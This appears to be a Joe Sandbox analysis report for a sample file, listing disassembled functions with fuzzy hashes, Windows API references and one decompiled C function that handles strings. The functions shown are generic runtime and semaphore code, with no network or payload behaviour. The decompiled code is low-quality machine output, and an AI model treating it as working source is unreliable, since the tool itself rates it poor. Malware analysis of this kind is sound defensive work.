Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: Byte$CharLeadMultiWide
String ID:
API String ID: 2561704868-0
Opcode ID: 0d13d39c234465ebfbf8995dad77b716b18866661116ad2be1587447b52bef58
Instruction ID: 5098e2d23af9623abae6b1b9841c3d1739a698a11a2b871041841fc1ef1e6a47
Opcode Fuzzy Hash: 0d13d39c234465ebfbf8995dad77b716b18866661116ad2be1587447b52bef58
Instruction Fuzzy Hash: D04104B05093518FD710DF28D48825ABBF0BF89358F04896EE9D587391E376D849CB43

Uniqueness

Uniqueness Score: -1.00%

Function 013DA4C1 Relevance: 6.1, APIs: 4, Instructions: 89COMMON

Download Yara Rule

APIs

ReleaseSemaphore.KERNEL32 ref: 013DA571

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: ReleaseSemaphore
String ID:
API String ID: 452062969-0
Opcode ID: 70292a7bfbaad6c31d78d821933309dfed9742af3f80ba90fb8536570e24b9a8
Instruction ID: c414d0290abe9f667ceab7d0def7a0afd457e45ef34d8fbbb4f23e9102e58cb7
Opcode Fuzzy Hash: 70292a7bfbaad6c31d78d821933309dfed9742af3f80ba90fb8536570e24b9a8
Instruction Fuzzy Hash: 9E4157B2606201CFD720DF28F688B16BBF1BB81328F45861CE9484B3A8E771E454CB91

Uniqueness

Uniqueness Score: -1.00%

Function 013DA660 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

ReleaseSemaphore.KERNEL32 ref: 013DA701

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: ReleaseSemaphore
String ID:
API String ID: 452062969-0
Opcode ID: d4951deb7525d4ae25b4032414a2ae18e4a00293dd7bbe2bc609e09a75297f37
Instruction ID: 7ec7e4a58059ea5cc7007a977bb8bbfec3a2963dceee1401f063a5124d6e11f2
Opcode Fuzzy Hash: d4951deb7525d4ae25b4032414a2ae18e4a00293dd7bbe2bc609e09a75297f37
Instruction Fuzzy Hash: A33169B2606301CFD7209F28F688B167BF1BB41328F46861CD9494B3A9E775E455CB92

Uniqueness

Uniqueness Score: -1.00%

Function 013DA981 Relevance: 6.1, APIs: 4, Instructions: 79synchronizationCOMMON

Download Yara Rule

APIs

ReleaseSemaphore.KERNEL32 ref: 013DAA22
CreateSemaphoreW.KERNEL32 ref: 013DAA67
WaitForSingleObject.KERNEL32 ref: 013DAAB0

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: Semaphore$CreateObjectReleaseSingleWait
String ID:
API String ID: 3817295960-0
Opcode ID: 8ff6a746739de7c33bdcd0e90e91f2024719b751e7ccadbe5dc7b0168fa0a8e0
Instruction ID: eda8744a8fb460b416443504836a42cab9f610b7617a24558b7c4e6abfc8e94a
Opcode Fuzzy Hash: 8ff6a746739de7c33bdcd0e90e91f2024719b751e7ccadbe5dc7b0168fa0a8e0
Instruction Fuzzy Hash: 4C315BB2606301CFE721DF28E684B16BBF1BB45318F41861DE9488B3A8E775E455CF92

Uniqueness

Uniqueness Score: -1.00%

Function 013DAB10 Relevance: 6.1, APIs: 4, Instructions: 76synchronizationCOMMON

Download Yara Rule

APIs

ReleaseSemaphore.KERNEL32 ref: 013DABA2
CreateSemaphoreW.KERNEL32 ref: 013DABE7
WaitForSingleObject.KERNEL32 ref: 013DAC30

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: Semaphore$CreateObjectReleaseSingleWait
String ID:
API String ID: 3817295960-0
Opcode ID: 034e08950d1404d0d189e3e326ebd6fe43ab1f474b3f82a590fc7ab29b57c2db
Instruction ID: fcb8e06cf5f2c0469da9a4e823a10c76d238f55171a166892a496e8af19c7409
Opcode Fuzzy Hash: 034e08950d1404d0d189e3e326ebd6fe43ab1f474b3f82a590fc7ab29b57c2db
Instruction Fuzzy Hash: BE3138B26063018FDB219F28E688716BFF1BB41328F05861CD9488B3A8E775E455CF92

Uniqueness

Uniqueness Score: -1.00%

Function 013D0338 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 64stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 013D208E

Strings

this, xrefs: 013D0343
{parm#, xrefs: 013D2069
}, xrefs: 013D2122

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: strlen
String ID: this${parm#$}
API String ID: 39653677-3278767634
Opcode ID: 398526debdac04161ac1bc7ded6238f195139776a94a566cea33d122cace8304
Instruction ID: 9eaa5954e97987bfb4d5ac90479aad2e1b0194286af932c3cb71c5befccff0c5
Opcode Fuzzy Hash: 398526debdac04161ac1bc7ded6238f195139776a94a566cea33d122cace8304
Instruction Fuzzy Hash: 4B218D7150C341CBD7119F28D0843AABBA1AFA4708F19C4BEDCC84F60BD7759885DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 013C1001 Relevance: 6.1, APIs: 4, Instructions: 57COMMON

Download Yara Rule

APIs

__set_app_type.MSVCRT ref: 013C106B
__p__fmode.MSVCRT ref: 013C1070
__p__commode.MSVCRT ref: 013C107D

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: __p__commode__p__fmode__set_app_type
String ID:
API String ID: 3338496922-0
Opcode ID: e7e093825b5fb23aab9cc5b4aee6792f18aa5e8e67ac52983903afb44ed86435
Instruction ID: a42673ff92faba8b42563078b358633717a70e187dd25dd0711e08a1773eb8ae
Opcode Fuzzy Hash: e7e093825b5fb23aab9cc5b4aee6792f18aa5e8e67ac52983903afb44ed86435
Instruction Fuzzy Hash: 6521D0B1700262CFC324AF28D11976537F6BB0470CF85856CC1088A65FE7BAD88AEB56

Uniqueness

Uniqueness Score: -1.00%

Function 0143E560 Relevance: 6.0, APIs: 4, Instructions: 30stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 0143E575
strlen.MSVCRT ref: 0143E57F
memcpy.MSVCRT ref: 0143E5A8
setlocale.MSVCRT ref: 0143E5BC

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: setlocale$memcpystrlen
String ID:
API String ID: 4096897932-0
Opcode ID: 6229abf3670c828634f8fa930a6bf584a735215ca9c4a610f46a1f818c467b35
Instruction ID: da0089779f84dc080356ca4f5f0057df8ea2fe7464c055ff143f043e63a96a00
Opcode Fuzzy Hash: 6229abf3670c828634f8fa930a6bf584a735215ca9c4a610f46a1f818c467b35
Instruction Fuzzy Hash: B6F05EB19093119AE7007F6D844836FBEE4EFA4354F428C6ED4C89B350D77894548B92

Uniqueness

Uniqueness Score: -1.00%

Function 0145D1C0 Relevance: 5.4, APIs: 4, Instructions: 369
stringCOMMON

Download Yara Rule

C-Code - Quality: 29%

			E0145D1C0(char __ecx, void* __eflags, char _a4) {
				void* _v16;
				char _v32;
				char _v33;
				char _v34;
				char _v35;
				signed char* _v48;
				char* _v52;
				char _v56;
				char _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t143;
				intOrPtr* _t145;
				char _t147;
				void* _t151;
				char _t158;
				intOrPtr _t160;
				intOrPtr* _t163;
				char _t165;
				char _t167;
				intOrPtr _t169;
				intOrPtr* _t172;
				char _t174;
				char _t178;
				intOrPtr _t180;
				intOrPtr* _t183;
				intOrPtr _t185;
				signed char* _t186;
				signed int _t188;
				intOrPtr* _t189;
				signed int _t190;
				intOrPtr* _t191;
				signed int _t192;
				intOrPtr* _t199;
				intOrPtr _t200;
				intOrPtr* _t201;
				intOrPtr _t202;
				intOrPtr* _t204;
				intOrPtr _t205;
				intOrPtr* _t207;
				intOrPtr _t208;
				intOrPtr _t210;
				char* _t211;
				char _t245;
				char _t246;
				char _t251;
				char _t254;
				intOrPtr _t257;
				char _t266;
				signed char* _t276;
				signed char* _t278;
				void* _t279;
				char* _t282;
				intOrPtr _t284;
				signed char* _t285;
				char* _t286;
				wchar_t* _t287;
				wchar_t* _t288;
				wchar_t* _t289;
				char _t290;
				void* _t293;
				void* _t294;
				void* _t295;
				void* _t296;
				void* _t297;
				signed char** _t298;
				intOrPtr* _t299;
				intOrPtr* _t300;

				_t245 = __ecx;
				_t295 = _t294 - 0x4c;
				_v92 = _a4;
				_t143 = E01474DE0(__eflags);
				_t290 = _t143;
				_t145 =  *((intOrPtr*)( *_t143 + 0x14));
				if(_t145 != E013EB700) {
					_v92 = _t290;
					 *_t145();
					_t147 = _v32;
					_t295 = _t295 - 4;
				} else {
					_t275 = 0xfffffffe;
					_t289 =  *( *((intOrPtr*)(_t290 + 8)) + 0x18);
					if(_t289 != 0) {
						_t275 = _t289 + wcslen(_t289) * 2;
					}
					_t147 = E0142F990(_t289, _t245,  &_v33, _t275, _t289, _t290, _t293);
					_v32 = _t147;
				}
				_t284 =  *((intOrPtr*)(_t147 - 0xc));
				_v64 = _t284;
				if(_t284 > 0x3ffffffe) {
					E01479D50(_t245);
					_t151 = E0142FE70(_v32 - 0xc,  &_v33);
					_v100 = _t245;
					E013D8C90(_t151, _t245, _t275, _t284, _t290);
					L63:
					_t246 = E01479D50(_t245);
					while(1) {
						L59:
						_t154 = _v52;
						_v96 = _v52;
						L01477900();
						while(1) {
							_v96 = _t246;
							E013D8C90(_t154, _t246, _t275, _t284, _t290);
							_v96 = _v60;
							L01477900();
							_t154 = _v56;
							_v96 = _v56;
							L01477900();
							__eflags = _v52;
							if(_v52 != 0) {
								goto L59;
							}
						}
					}
				}
				_t158 = L01477930(_t284 + _t284);
				_v52 = _t158;
				_v88 = 0;
				_v92 = _t284;
				_v96 = _t158;
				E013E90E0(_t245,  &_v32);
				_t160 =  *0x14a31d0; // 0x2
				_t251 = _v32;
				_t296 = _t295 - 0xc;
				if(_t160 != 0) {
					asm("lock xadd [ecx-0x4], eax");
					__eflags = 0xffffffff;
					if(0xffffffff > 0) {
						goto L7;
					} else {
						goto L46;
					}
					goto L25;
				} else {
					_t18 =  *((intOrPtr*)(_t251 - 4)) - 1; // -1
					_t275 = _t18;
					 *((intOrPtr*)(_t251 - 4)) = _t18;
					if( *((intOrPtr*)(_t251 - 4)) <= 0) {
						L46:
						_v96 =  &_v33;
						E0142FE50( &_v33, _t251 - 0xc);
						_t296 = _t296 - 4;
						_t163 =  *((intOrPtr*)( *_t290 + 0x18));
						__eflags = _t163 - E013EB7A0;
						if(_t163 == E013EB7A0) {
							goto L8;
						} else {
							goto L47;
						}
						L25:
						_t276 =  *(_t185 - 0xc);
						_v48 = _t276;
						 *_t298 = _t276;
						_t186 = L01477930();
						_v100 = 0;
						_t285 = _t186;
						 *_t298 = _t186;
						_v104 = _v48;
						E013EA140(_t245,  &_v32);
						_t278 = _v48;
						 *(_t245 + 8) = _t285;
						_t299 = _t298 - 0xc;
						_t188 = 0;
						 *(_t245 + 0xc) = _t278;
						if(_t278 != 0) {
							_t188 = ( *_t285 & 0x000000ff) - 0x00000001 & 0xffffff00 | ( *_t285 & 0x000000ff) - 0x00000001 - 0x0000007d < 0x00000000;
						}
						_t279 =  *_t290;
						 *(_t245 + 0x10) = _t188;
						_t189 =  *((intOrPtr*)(_t279 + 8));
						if(_t189 != E013EB750) {
							_t190 =  *_t189();
							_t279 =  *_t290;
						} else {
							_t190 =  *( *((intOrPtr*)(_t290 + 8)) + 0x12) & 0x0000ffff;
						}
						 *(_t245 + 0x12) = _t190;
						_t191 =  *((intOrPtr*)(_t279 + 0xc));
						if(_t191 != E013EB7E0) {
							_t192 =  *_t191();
							_t279 =  *_t290;
						} else {
							_t192 =  *( *((intOrPtr*)(_t290 + 8)) + 0x14) & 0x0000ffff;
						}
						 *(_t245 + 0x14) = _t192;
						 *(_t245 + 0x18) = _v52;
						 *((intOrPtr*)(_t245 + 0x1c)) = _v64;
						 *((intOrPtr*)(_t245 + 0x20)) = _v56;
						 *((intOrPtr*)(_t245 + 0x24)) = _v68;
						 *((intOrPtr*)(_t245 + 0x28)) = _v60;
						 *((intOrPtr*)(_t245 + 0x2c)) = _v72;
						_t199 =  *((intOrPtr*)(_t279 + 0x20));
						if(_t199 != E013EB740) {
							_t200 =  *_t199();
							_t279 =  *_t290;
						} else {
							_t200 =  *((intOrPtr*)( *((intOrPtr*)(_t290 + 8)) + 0x30));
						}
						 *((intOrPtr*)(_t245 + 0x30)) = _t200;
						_t201 =  *((intOrPtr*)(_t279 + 0x24));
						if(_t201 != E013EB5F0) {
							_t202 =  *_t201();
						} else {
							_t202 =  *((intOrPtr*)( *((intOrPtr*)(_t290 + 8)) + 0x34));
						}
						 *((intOrPtr*)(_t245 + 0x34)) = _t202;
						_t204 =  *((intOrPtr*)( *_t290 + 0x28));
						_t329 = _t204 - E013EB5E0;
						if(_t204 != E013EB5E0) {
							_t205 =  *_t204();
						} else {
							_t205 =  *((intOrPtr*)( *((intOrPtr*)(_t290 + 8)) + 0x38));
						}
						 *((intOrPtr*)(_t245 + 0x38)) = _t205;
						 *_t299 = _a4;
						_t207 = E01474F60(_t329);
						_t208 =  *0x14a4668; // 0x14ab360
						_t107 = _t245 + 0x3c; // 0x3c
						_v100 = _t107;
						_t109 = _t208 + 0xb; // 0x14ab36b
						 *_t299 = _t208;
						_v104 = _t109;
						 *((intOrPtr*)( *_t207 + 0x2c))();
						_t210 =  *0x14a31d0; // 0x2
						_t266 = _v32;
						 *((char*)(_t245 + 0x52)) = 1;
						_t300 = _t299 - 0xc;
						if(_t210 != 0) {
							_t211 = 0xffffffff;
							asm("lock xadd [ecx-0x4], eax");
							__eflags = 0xffffffff;
							if(0xffffffff > 0) {
								goto L39;
							} else {
								goto L44;
							}
						} else {
							_t211 =  *(_t266 - 4);
							_t115 = _t211 - 1; // -1
							 *(_t266 - 4) = _t115;
							if(_t211 <= 0) {
								L44:
								__eflags = _t266 - 0xc;
								 *_t300 =  &_v33;
								return E01438FD0( &_v33, _t266 - 0xc);
							} else {
								L39:
								return _t211;
							}
						}
					} else {
						L7:
						_t163 =  *((intOrPtr*)( *_t290 + 0x18));
						if(_t163 != E013EB7A0) {
							L47:
							_v96 = _t290;
							 *_t163();
							_t165 = _v32;
							_t296 = _t296 - 4;
						} else {
							L8:
							_t275 = 0xfffffffe;
							_t288 =  *( *((intOrPtr*)(_t290 + 8)) + 0x20);
							if(_t288 != 0) {
								_t275 = _t288 + wcslen(_t288) * 2;
							}
							_t165 = E0142F990(_t288, _t245,  &_v35, _t275, _t288, _t290, _t293);
							_v32 = _t165;
						}
					}
				}
				_t284 =  *((intOrPtr*)(_t165 - 0xc));
				_v68 = _t284;
				if(_t284 > 0x3ffffffe) {
					goto L63;
				}
				_t167 = L01477930(_t284 + _t284);
				_v56 = _t167;
				_v92 = 0;
				_v96 = _t284;
				_v100 = _t167;
				E013E90E0(_t245,  &_v32);
				_t169 =  *0x14a31d0; // 0x2
				_t254 = _v32;
				_t297 = _t296 - 0xc;
				if(_t169 != 0) {
					asm("lock xadd [ecx-0x4], eax");
					__eflags = 0xffffffff;
					if(0xffffffff > 0) {
						goto L14;
					} else {
						goto L41;
					}
					goto L25;
				} else {
					_t36 =  *((intOrPtr*)(_t254 - 4)) - 1; // -1
					_t275 = _t36;
					 *((intOrPtr*)(_t254 - 4)) = _t36;
					if( *((intOrPtr*)(_t254 - 4)) <= 0) {
						L41:
						_v100 =  &_v33;
						E0142FE50( &_v33, _t254 - 0xc);
						_t297 = _t297 - 4;
						_t172 =  *((intOrPtr*)( *_t290 + 0x1c));
						__eflags = _t172 - E013EB760;
						if(_t172 == E013EB760) {
							goto L15;
						} else {
							goto L42;
						}
						goto L25;
					} else {
						L14:
						_t172 =  *((intOrPtr*)( *_t290 + 0x1c));
						if(_t172 != E013EB760) {
							L42:
							_v100 = _t290;
							 *_t172();
							_t174 = _v32;
							_t297 = _t297 - 4;
						} else {
							L15:
							_t275 = 0xfffffffe;
							_t287 =  *( *((intOrPtr*)(_t290 + 8)) + 0x28);
							if(_t287 != 0) {
								_t275 = _t287 + wcslen(_t287) * 2;
							}
							_t174 = E0142F990(_t287, _t245,  &_v34, _t275, _t287, _t290, _t293);
							_v32 = _t174;
						}
					}
				}
				_t284 =  *((intOrPtr*)(_t174 - 0xc));
				_v72 = _t284;
				if(_t284 > 0x3ffffffe) {
					_t246 = E01479D50(_t245);
					_v104 = _v56;
					L01477900();
					goto L59;
				}
				_t178 = L01477930(_t284 + _t284);
				_v60 = _t178;
				_v96 = 0;
				_v100 = _t284;
				_v104 = _t178;
				E013E90E0(_t245,  &_v32);
				_t180 =  *0x14a31d0; // 0x2
				_t257 = _v32;
				_t298 = _t297 - 0xc;
				if(_t180 != 0) {
					asm("lock xadd [ecx-0x4], eax");
					__eflags = 0xffffffff;
					if(0xffffffff > 0) {
						goto L21;
					} else {
						goto L49;
					}
				} else {
					_t54 =  *((intOrPtr*)(_t257 - 4)) - 1; // -1
					 *((intOrPtr*)(_t257 - 4)) = _t54;
					if( *((intOrPtr*)(_t257 - 4)) <= 0) {
						L49:
						_v104 =  &_v33;
						E0142FE50( &_v33, _t257 - 0xc);
						_t298 = _t298 - 4;
						_t183 =  *((intOrPtr*)( *_t290 + 0x10));
						__eflags = _t183 - E013EB560;
						if(_t183 == E013EB560) {
							goto L22;
						} else {
							goto L50;
						}
					} else {
						L21:
						_t183 =  *((intOrPtr*)( *_t290 + 0x10));
						if(_t183 != E013EB560) {
							L50:
							_v104 = _t290;
							 *_t183();
							_t185 = _v32;
							_t298 = _t298 - 4;
						} else {
							L22:
							_t282 = 0xffffffff;
							_t286 =  *( *((intOrPtr*)(_t290 + 8)) + 8);
							if(_t286 != 0) {
								_t282 =  &(_t286[strlen(_t286)]);
							}
							_t185 = E01438AF0(_t286, _t245,  &_v33, _t282, _t286, _t290, _t293);
							_v32 = _t185;
						}
					}
				}
				goto L25;
			}

0x0145d1c6
0x0145d1c8
0x0145d1ce
0x0145d1d1
0x0145d1d6
0x0145d1da
0x0145d1e2
0x0145d620
0x0145d626
0x0145d628
0x0145d62b
0x0145d1e8
0x0145d1eb
0x0145d1f0
0x0145d1f5
0x0145d1ff
0x0145d1ff
0x0145d207
0x0145d20c
0x0145d20c
0x0145d20f
0x0145d212
0x0145d21b
0x0145d720
0x0145d731
0x0145d737
0x0145d73a
0x0145d73f
0x0145d744
0x0145d6c6
0x0145d6c6
0x0145d6c6
0x0145d6c9
0x0145d6cc
0x0145d6d1
0x0145d6d1
0x0145d6d4
0x0145d6dc
0x0145d6df
0x0145d6e4
0x0145d6e7
0x0145d6ea
0x0145d6ef
0x0145d6f3
0x00000000
0x00000000
0x0145d6f5
0x0145d6d1
0x0145d6c6
0x0145d227
0x0145d22c
0x0145d232
0x0145d23a
0x0145d23e
0x0145d241
0x0145d246
0x0145d24b
0x0145d24e
0x0145d253
0x0145d585
0x0145d58a
0x0145d58c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0145d259
0x0145d25c
0x0145d25c
0x0145d25f
0x0145d264
0x0145d592
0x0145d598
0x0145d59b
0x0145d5a2
0x0145d5a5
0x0145d5a8
0x0145d5ad
0x00000000
0x00000000
0x00000000
0x00000000
0x0145d3c5
0x0145d3c5
0x0145d3c8
0x0145d3cb
0x0145d3ce
0x0145d3d3
0x0145d3e1
0x0145d3e3
0x0145d3e6
0x0145d3ea
0x0145d3ef
0x0145d3f2
0x0145d3f5
0x0145d3f8
0x0145d3fa
0x0145d3ff
0x0145d409
0x0145d409
0x0145d40c
0x0145d40e
0x0145d411
0x0145d419
0x0145d67a
0x0145d67c
0x0145d41f
0x0145d422
0x0145d422
0x0145d426
0x0145d42a
0x0145d432
0x0145d66a
0x0145d66c
0x0145d438
0x0145d43b
0x0145d43b
0x0145d43f
0x0145d446
0x0145d44c
0x0145d452
0x0145d458
0x0145d45e
0x0145d464
0x0145d467
0x0145d46f
0x0145d65a
0x0145d65c
0x0145d475
0x0145d478
0x0145d478
0x0145d47b
0x0145d47e
0x0145d486
0x0145d64a
0x0145d48c
0x0145d48f
0x0145d48f
0x0145d492
0x0145d497
0x0145d49a
0x0145d49f
0x0145d63a
0x0145d4a5
0x0145d4a8
0x0145d4a8
0x0145d4ab
0x0145d4b1
0x0145d4b4
0x0145d4bb
0x0145d4c0
0x0145d4c5
0x0145d4c9
0x0145d4cc
0x0145d4cf
0x0145d4d3
0x0145d4d6
0x0145d4db
0x0145d4de
0x0145d4e2
0x0145d4e7
0x0145d550
0x0145d555
0x0145d55a
0x0145d55c
0x00000000
0x00000000
0x00000000
0x00000000
0x0145d4e9
0x0145d4e9
0x0145d4ec
0x0145d4ef
0x0145d4f4
0x0145d55e
0x0145d561
0x0145d564
0x0145d576
0x0145d4f6
0x0145d4f6
0x0145d4fd
0x0145d4fd
0x0145d4f4
0x0145d26a
0x0145d26a
0x0145d26c
0x0145d274
0x0145d5b3
0x0145d5b3
0x0145d5b9
0x0145d5bb
0x0145d5be
0x0145d27a
0x0145d27a
0x0145d27d
0x0145d282
0x0145d287
0x0145d291
0x0145d291
0x0145d299
0x0145d29e
0x0145d29e
0x0145d274
0x0145d264
0x0145d2a1
0x0145d2a4
0x0145d2ad
0x00000000
0x00000000
0x0145d2b9
0x0145d2be
0x0145d2c4
0x0145d2cc
0x0145d2d0
0x0145d2d3
0x0145d2d8
0x0145d2dd
0x0145d2e0
0x0145d2e5
0x0145d505
0x0145d50a
0x0145d50c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0145d2eb
0x0145d2ee
0x0145d2ee
0x0145d2f1
0x0145d2f6
0x0145d512
0x0145d518
0x0145d51b
0x0145d522
0x0145d525
0x0145d528
0x0145d52d
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0145d2fc
0x0145d2fc
0x0145d2fe
0x0145d306
0x0145d533
0x0145d533
0x0145d539
0x0145d53b
0x0145d53e
0x0145d30c
0x0145d30c
0x0145d30f
0x0145d314
0x0145d319
0x0145d323
0x0145d323
0x0145d32b
0x0145d330
0x0145d330
0x0145d306
0x0145d2f6
0x0145d333
0x0145d336
0x0145d33f
0x0145d69d
0x0145d6be
0x0145d6c1
0x00000000
0x0145d6c1
0x0145d34b
0x0145d350
0x0145d356
0x0145d35e
0x0145d362
0x0145d365
0x0145d36a
0x0145d36f
0x0145d372
0x0145d377
0x0145d5d5
0x0145d5da
0x0145d5dc
0x00000000
0x00000000
0x00000000
0x00000000
0x0145d37d
0x0145d380
0x0145d383
0x0145d388
0x0145d5e2
0x0145d5e8
0x0145d5eb
0x0145d5f2
0x0145d5f5
0x0145d5f8
0x0145d5fd
0x00000000
0x00000000
0x00000000
0x00000000
0x0145d38e
0x0145d38e
0x0145d390
0x0145d398
0x0145d603
0x0145d603
0x0145d609
0x0145d60b
0x0145d60e
0x0145d39e
0x0145d39e
0x0145d3a1
0x0145d3a6
0x0145d3ab
0x0145d3b5
0x0145d3b5
0x0145d3bd
0x0145d3c2
0x0145d3c2
0x0145d398
0x0145d388
0x00000000

APIs

wcslen.MSVCRT ref: 0145D1FA
wcslen.MSVCRT ref: 0145D28C
wcslen.MSVCRT ref: 0145D31E
strlen.MSVCRT ref: 0145D3B0

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
